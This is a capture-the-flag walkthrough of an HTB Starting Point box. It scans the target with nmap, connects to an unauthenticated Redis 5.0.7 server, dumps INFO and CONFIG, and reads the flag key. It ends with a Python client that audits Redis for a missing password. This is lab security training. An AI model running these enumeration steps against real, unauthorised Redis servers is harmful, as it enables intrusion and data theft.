This is one of the Starting Point HTB boxes.
It is rated as very easy and has only one flag.
$ nmap -p- -A 10.129.216.146 --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-05 10:51 CEST
Nmap scan report for 10.129.216.146
Host is up (0.037s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 5.0.7
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.54 seconds
So, we are facing a Redis v5.0.7 instance.
According to its site:
Redis is an open source (BSD licensed), in-memory data structure store used as a database, cache, message broker, and streaming engine. Redis provides data structures such as strings, hashes, lists, sets, sorted sets with range queries, bitmaps, hyperloglogs, geospatial indexes, and streams. Redis has built-in replication, Lua scripting, LRU eviction, transactions, and different levels of on-disk persistence, and provides high availability via Redis Sentinel and automatic partitioning with Redis Cluster.
https://redis.io/
Let's enumerate this Redis instance.
$ redis-cli -h 10.129.216.146
10.129.216.146:6379>
No credentials are needed: the server accepts the connection without AUTH.
With these commands we can get information from the Redis instance:
10.129.216.146:6379> info
# Server
redis_version:5.0.7
...
lru_clock:10252452
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
# Clients
connected_clients:1
...
blocked_clients:0
# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:6062080
...
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0
# Persistence
loading:0
rdb_changes_since_last_save:4
...
aof_last_cow_size:0
# Stats
total_connections_received:18
total_commands_processed:22
...
active_defrag_key_hits:0
active_defrag_key_misses:0
# Replication
role:master
...
repl_backlog_histlen:0
# CPU
used_cpu_sys:0.634172
...
used_cpu_user_children:0.000000
# Cluster
cluster_enabled:0
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
...
10.129.216.146:6379> config get *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "cluster-announce-ip"
8) ""
9) "unixsocket"
10) ""
11) "logfile"
12) "/var/log/redis/redis-server.log"
13) "pidfile"
14) "/var/run/redis/redis-server.pid"
15) "slave-announce-ip"
16) ""
...
From the INFO output (the Keyspace section) we can see there is a database 0 with 4 keys.
Redis databases are numbered starting from 0.
10.129.216.146:6379> select 0
OK
10.129.216.146:6379> keys *
1) "stor"
2) "temp"
3) "numb"
4) "flag"
10.129.216.146:6379> GET flag
"03e1XXXXXXXXXXXXXXXXXXXXXXXXXXXX"
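As an added example (not part of the original writeup), here is a small Python RESP client that performs the same INFO and CONFIG GET queries and reports whether the instance requires a password and how many keys db0 holds. The audit, assess and assess_sample functions are my own, and the reply bytes in assess_sample are constructed to mirror the output above, not captured from the box.

```python
import io, socket
def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings, as redis-cli sends it."""
    return b"*%d\r\n" % len(args) + b"".join(
        b"$%d\r\n%s\r\n" % (len(a.encode()), a.encode()) for a in args)

def parse_resp(stream):
    """Read one RESP value from a binary stream (socket file or BytesIO)."""
    kind, line = stream.read(1), stream.readline().rstrip(b"\r\n")
    if kind == b"+":
        return line.decode()
    if kind == b"-":
        raise RuntimeError("redis error: " + line.decode())
    if kind == b"$":                        # bulk string; -1 means null
        size = int(line)
        return None if size < 0 else stream.read(size + 2)[:size].decode()
    if kind == b"*":                        # array: one value per element
        return [parse_resp(stream) for _ in range(int(line))]
    raise ValueError("unexpected RESP type %r" % kind)

def assess(config_reply: list, info_reply: str) -> dict:
    """Turn CONFIG GET (flat key/value array) and INFO (bulk string) into findings."""
    cfg = dict(zip(config_reply[::2], config_reply[1::2]))
    fields = dict(ln.split(":", 1) for ln in info_reply.splitlines()
                  if ":" in ln and not ln.startswith("#"))
    db0 = dict(kv.split("=") for kv in fields.get("db0", "keys=0").split(","))
    return {"version": fields.get("redis_version"), "db0_keys": int(db0["keys"]),
            "auth_required": cfg.get("requirepass", "") != "",
            "protected_mode": cfg.get("protected-mode") == "yes"}

def audit(host: str, port: int = 6379) -> dict:
    """Run both queries live against an instance you administer."""
    with socket.create_connection((host, port), timeout=3) as sock, sock.makefile("rb") as rd:
        sock.sendall(encode_command("CONFIG", "GET", "*"))
        try:
            config = parse_resp(rd)
        except RuntimeError as err:         # -NOAUTH reply: a password is set
            if "NOAUTH" not in str(err):
                raise
            return {"auth_required": True}
        sock.sendall(encode_command("INFO"))
        return assess(config, parse_resp(rd))

def assess_sample() -> dict:
    """Assess constructed replies shaped like the writeup's output (not a live capture)."""
    config = b"*4\r\n$11\r\nrequirepass\r\n$0\r\n\r\n$14\r\nprotected-mode\r\n$2\r\nno\r\n"
    info = (b"# Server\r\nredis_version:5.0.7\r\n"
            b"# Keyspace\r\ndb0:keys=4,expires=0,avg_ttl=0\r\n")
    info_reply = b"$%d\r\n%s\r\n" % (len(info), info)
    return assess(parse_resp(io.BytesIO(config)), parse_resp(io.BytesIO(info_reply)))
```

On a hardened instance the first reply is a NOAUTH error, which audit reports as auth_required instead of reading the configuration.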